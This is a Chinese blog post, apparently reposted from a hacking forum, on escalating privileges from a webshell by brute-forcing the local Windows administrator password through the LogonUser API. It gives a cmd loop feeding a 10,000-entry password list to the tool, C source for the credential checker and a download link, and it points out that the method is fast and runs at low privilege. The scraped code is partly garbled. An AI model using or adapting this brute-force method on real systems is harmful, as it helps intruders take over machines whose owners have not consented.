webshell下的另类提权之3389密码爆破

  • A+
所属分类:颓废's Blog
摘要

在土司看到的由x0wolf发布的一个提权新思路觉得不错就收藏过来了。 利用 LogonUser API 模拟用户登陆  判断账号密码登陆成功与否(就是本地爆破) 该种方法不通过网络 速度极快 低权限 (webshell下) 就可以运行 for /f %i in (10k_passwd.txt) do test.exe administrator %i 1w 字典几乎是几秒,缺点就是会产生大量系统登陆日志。 脚本:

在土司看到的由x0wolf发布的一个提权新思路觉得不错就收藏过来了。 利用 LogonUser API 模拟用户登陆  判断账号密码登陆成功与否(就是本地爆破) 该种方法不通过网络 速度极快 低权限 (webshell下) 就可以运行 for /f %i in (10k_passwd.txt) do test.exe administrator %i 1w 字典几乎是几秒,缺点就是会产生大量系统登陆日志。 脚本:

#include #include   void help()  {                     printf("by x0wolf && lostwolf n");                      printf("runas user passn");  }    int LoginCreateProcess(char* user,char* pass)  {                     HANDLE hToken;              STARTUPINFOA   si;              PROCESS_INFORMATION pi;               ZeroMemory(&si, sizeof(si));              ZeroMemory(&pi, sizeof(pi));               si.cb = sizeof(si);                if(0 == LogonUser(user, ".", pass, LOGON32_LOGON_INTERACTIVE, LOGON32_PROVIDER_DEFAULT, &hToken))  {                               printf("Failed to call LogonUser FailedNum:%dn",GetLastError());              return 0;     }                       else   {                               printf("Login Sucessedn");               return 1;   }   }                 int main(int argc,char* argv[])  {                       if(argc!=3)  {                               help();                               exit(0);            }                       if(argc==3)           {                               LoginCreateProcess(argv[1],argv[2]);           }    }

工具下载:https://pan.baidu.com/s/1sl54gUh

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: